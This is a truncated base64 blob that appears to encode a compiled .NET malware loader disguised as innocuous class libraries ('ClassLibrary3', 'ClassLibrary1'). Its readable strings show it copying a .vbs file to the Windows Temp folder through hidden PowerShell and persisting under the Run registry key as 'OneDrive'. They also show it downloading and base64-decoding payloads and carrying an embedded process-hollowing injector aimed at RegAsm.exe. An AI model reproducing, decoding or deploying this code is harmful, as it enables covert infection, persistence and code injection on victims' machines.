BZAF4AYwCHAI0ArACxADABOQFBAUYBTgFiAQQAAQAFAAUABgAIAAcACQAKAAoAAACaBhcCAABeBRwCAACGBiECAAAfByYCAABOBisCAAC4ATACAAA2ADYCAACeCDsCAAAvCDsCAAD/AEACAgAEAAMAAgAFAAUAAgAGAAcAAgAHAAkAAgAIAAsAAgAJAA0AAQAKAA0AAgALAA8AAgAOABEAAgAPABMAAgAZABUALgA1ADwAQwCgAFQBagF5AYABBIAAAAEAAAAAAAAAAAAAAAAAVAAAAAQAAAAAAAAAAAAAAI4BsQAAAAAABAAAAAAAAAAAAAAAjgEABQAAAAAKAAAAAAAAAAAAAACXAboAAAAAAAAAAAABAAAA5wcAAAkABAAKAAQAAAAQABQAfAAAABAALQB8AAAAAAAvAHwAiwBdAYsAgwEAAAAAAENvbnRleHRWYWx1ZWAxAFRocmVhZFNhZmVPYmplY3RQcm92aWRlcmAxAENsYXNzMQBnZXRfQ2xhc3NMaWJyYXJ5MQBNaWNyb3NvZnQuV2luMzIAQ2xhc3NMaWJyYXJ5MwA8TW9kdWxlPgBMQWJXSksAU3lzdGVtLklPAFQARGlzcG9zZV9fSW5zdGFuY2VfXwBDcmVhdGVfX0luc3RhbmNlX18AUHJvamVjdERhdGEAbXNjb3JsaWIATWljcm9zb2Z0LlZpc3VhbEJhc2ljAExvYWQAU3luY2hyb25pemVkAEdldE1ldGhvZABDcmVhdGVJbnN0YW5jZQBnZXRfR2V0SW5zdGFuY2UAZGVmYXVsdEluc3RhbmNlAGluc3RhbmNlAEdldEhhc2hDb2RlAEludm9rZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBGaWxlAHNldF9XaW5kb3dTdHlsZQBQcm9jZXNzV2luZG93U3R5bGUAc2V0X0ZpbGVOYW1lAEdldFR5cGUAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAcmVzb3VyY2VDdWx0dXJlAE1ldGhvZEJhc2UAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAENsb3NlAFN0clJldmVyc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBIZWxwS2V5d29yZEF0dHJpYnV0ZQBHZW5lcmF0ZWRDb2RlQXR0cmlidXRlAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBEZWJ1Z2dlckhpZGRlbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUAU2V0VmFsdWUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABTeXN0ZW0AcmVzb3VyY2VNYW4AU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBNZXRob2RJbmZvAEN1bHR1cmVJbmZvAHNldF9TdGFydEluZm8AUHJvY2Vzc1N0YXJ0SW5mbwBtX0FwcE9iamVjdFByb3ZpZGVyAG1fVXNlck9iamVjdFByb3ZpZGVyAG1fQ29tcHV0ZXJPYmplY3RQcm92aWRlcgBtX015V2ViU2VydmljZXNPYmplY3RQcm92aWRlcgBnZXRfUmVzb3VyY2VNYW5hZ2VyAFN5c3RlbS5Db2RlRG9tLkNvbXBpbGVyAGdldF9Vc2VyAEN1cnJlbnRVc2VyAGdldF9Db21wdXRlcgBNeUNvbXB1dGVyAENsZWFyUHJvamVjdEVycm9yAFNldFByb2plY3RFcnJvcgBBY3RpdmF0b3IALmN0b3IALmNjdG9yAFN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXMATXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAENsYXNzTGlicmFyeTMuTXkuUmVzb3VyY2VzAENsYXNzTGlicmFyeTMuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBTdHJpbmdzAGdldF9TZXR0aW5ncwBNeVNldHRpbmdzAFJlZmVyZW5jZUVxdWFscwBSdW50aW1lSGVscGVycwBQcm9jZXNzAHNldF9Bcmd1bWVudHMARXhpc3RzAENvbmNhdABHZXRPYmplY3QATXlQcm9qZWN0AFN5c3RlbS5OZXQAZ2V0X0RlZmF1bHQAV2ViQ2xpZW50AFN0YXJ0AENvbnZlcnQAbV9Db250ZXh0AENsYXNzTGlicmFyeTMuTXkAT3BlblN1YktleQBSZWdpc3RyeUtleQBnZXRfQXNzZW1ibHkAUmVnaXN0cnkATXlTZXR0aW5nc1Byb3BlcnR5AAAAAAAvQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMwAuAFIAZQBzAG8AdQ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oTMAgASQAAAAAAAABzBQAACoABAAAEFisBFkUDAAAAAgAAAA8AAAAcAAAAKydzBgAACoACAAAEFyvgcwcAAAqAAwAABBgr03MIAAAKgAQAAAQZK8YqAAAAEzABABMAAAABAAARFysBFiwAfgEAAARvCQAACgoGKgATMAEAEwAAAAIAABEXKwEWLAB+AgAABG8KAAAKCgYqABMwAQATAAAAAwAAERcrARYsAH4DAAAEbwsAAAoKBioAEzABABMAAAAEAAARFysBFiwAfgQAAARvDAAACgoGKgATMAIAVwAAAAUAABF+BQAABBQoGwAACgsWKwEWRQMAAAACAAAAIgAAACsAAAArMgcsJnIBAABw0AUAAAIoEAAACm8cAAAKcx0AAAoMFyvNCIAFAAAEGCvEfgUAAAQKGSu7BioAEzABAA4AAAAGAAARFysBFiwAfgYAAAQKBioeAoAGAAAEKlZzDAAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhMwAQAOAAAABwAAERcrARYsAH4HAAAECgYqAAATMAEADgAAAAcAABEXKwEWLAAoDQAABgoGKh4CKBMAAAoqAAATMAQAQwAAAAgAABEXCwJ+IQAACgMXKBsAAAYMFisBFkUDAAAAAgAAAAoAAAATAAAAKxoILAcXChcr5SsQBxfWCxgr3AcbMcYWChkr0wYqABswCgCoBQAACQAAEXIxAABwAigiAAAKDBYrARZFBAAAAAUAAAAQAAAAGwAAACYAAAA4fAUAABID/hUMAAACFyvbEgT+FQsAAAIYK9ASAxZ9GAAABBkrxRID0AwAAAIoEAAACigjAAAKuH0NAAAEAygkAAAKFv4BExIWKwEWRSoAAAAFAAAAHAAAAEQAAABeAAAAcQAAAIMAAACSAAAAogAAAL8AAADlAAAA/QAAAB4BAAA3AQAAVQEAAHMBAACHAQAApwEAALsBAADJAQAA6AEAAPYBAAAfAgAAOgIAAE0CAABaAgAAZAIAAH0CAACRAgAApQIAALMCAADLAgAA4QIAAAYDAAAeAwAAPQMAAF4DAAB8AwAAhwMAAKADAACxAwAAzwMAAPUDAAA4EgQAABESLBMIcj0AAHADKCUAAAoMFzg3////Agh+JgAACn4mAAAKFhp+JgAAChQSAxIEKBAAAAYW/gETExg4D////xETLAZzJwAACnoEHzwoKAAAChMFGTj1/v//BBEFHzTWKCgAAAoTBho44v7//yCzAAAAjQoAAAETBxs40P7//xEHFiACAAEAnhw4wf7//ygpAAAKGv4BExQdOLH+//8RFCwlEQR7CgAABBEHKBEAAAYW/gETFR44lP7//xEVLAZzJwAACnorJBEEewoAAAQRBygSAAAGFv4BExYfCThu/v//ERYsBnMnAAAKehEHHymUEwgfCjhW/v//EQR7CQAABBEIHtYSCRoSASgVAAAGFv4BExcfCzg1/v//ERcsBnMnAAAKehEGEQn+ARMYHww4HP7//xEYLCQRBHsJAAAEEQkoFwAABhb+AxMZHw04/v3//xEZLAZzJwAACnoEEQUfUNYoKAAAChMKHw444P3//wQRBR9U1igoAAAKEwsfDzjM/f//EQR7CQAABBEGEQogADAAAB9AKBgAAAYTDR8QOKz9//8FLQcRDRb+ASsBFhMaHxE4mP3//xEaLCkXEwwfEjiK/f//EQR7CQAABBYRCiAAMAAAH0AoGAAABhMNHxM4a/3//xENFv4BExsfFDhd/f//ERssBnMnAAAKehEEewkAAAQRDQQRCxIBKBYAAAYW/gETHB8VODT9//8RHCwGcycAAAp6EQUg+AAAANYTDh8WOBn9//8EEQUc1igqAAAKEw8fFzgG/f//EQ8X2hMdHxg4+fz//xYTHh8ZOO/8//84uwAAAAQRDh8M1igoAAAKEx8fGjjW/P//BBEOHxDWKCgAAAoTIB8bOML8//8EEQ4fFNYoKAAAChMhHxw4rvz//xEgFv4DEyIfHTig/P//ESIsWREgF9oX1o0bAAABEyMfHjiI/P//BBEhESMWESOOaSgrAAAKHx84cvz//xEEewkAAAQRDREf1hEjESOOaRIBKBYAAAYW/gETJB8gOE38//8RJCwGcycAAAp6EQ4fKNYTDh8hODX8//8RHhfWEx4RHhEdPjz///8RDSgsAAAKExAfIjgW/P//EQR7CQAABBEIHtYREBoSASgWAAAGFv4BEyUfIzj1+///ESUsBnMnAAAKegQRBR8o1igoAAAKExEfJDjX+///EQwTJh8lOMz7//8RJiwEEQYTDREHHywRDRER1p4fJjiz+///KCkAAAoa/gETJx8nOKL7//8RJywmEQR7CgAABBEHKBMAAAYW/gETKB8oOIT7//8RKC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FmZU9iamVjdFByb3ZpZGVyYDEAUmVzZXJ2ZWQxAENsYXNzMQBDbGFzc0xpYnJhcnkxAFRvSW50MzIAY2JSZXNlcnZlZDIAVG9JbnQxNgA8TW9kdWxlPgBSZXN1bWVUaHJlYWRfQVBJAE50VW5tYXBWaWV3T2ZTZWN0aW9uX0FQSQBDcmVhdGVQcm9jZXNzX0FQSQBXb3c2NEdldFRocmVhZENvbnRleHRfQVBJAFdvdzY0U2V0VGhyZWFkQ29udGV4dF9BUEkAVmlydHVhbEFsbG9jRXhfQVBJAFJlYWRQcm9jZXNzTWVtb3J5X0FQSQBXcml0ZVByb2Nlc3NNZW1vcnlfQVBJAFNUQVJUVVBfSU5GT1JNQVRJT04AUFJPQ0VTU19JTkZPUk1BVElPTgBUAGR3WABkd1kARGlzcG9zZV9fSW5zdGFuY2VfXwBDcmVhdGVfX0luc3RhbmNlX18AU2l6ZV8AUHJvamVjdERhdGEAZGF0YQBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWMAVGhyZWFkSWQAUHJvY2Vzc0lkAEdldFByb2Nlc3NCeUlkAGJ5dGVzUmVhZABSZXN1bWVUaHJlYWQAdGhyZWFkAFN5bmNocm9uaXplZABjbWQAQ3JlYXRlSW5zdGFuY2UAZ2V0X0dldEluc3RhbmNlAGRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBjb21wYXRpYmxlAFRocmVhZEhhbmRsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBQcm9jZXNzSGFuZGxlAGhhbmRsZQBUaXRsZQBhcHBsaWNhdGlvbk5hbWUAY29tbWFuZExpbmUAVmFsdWVUeXBlAEdldFR5cGUAdHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAEVkaXRvckJyb3dzYWJsZVN0YXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUASGVscEtleXdvcmRBdHRyaWJ1dGUAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBTdGFuZGFyZE1vZHVsZUF0dHJpYnV0ZQBIaWRlTW9kdWxlTmFtZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAZHdGaWxsQXR0cmlidXRlAERlYnVnZ2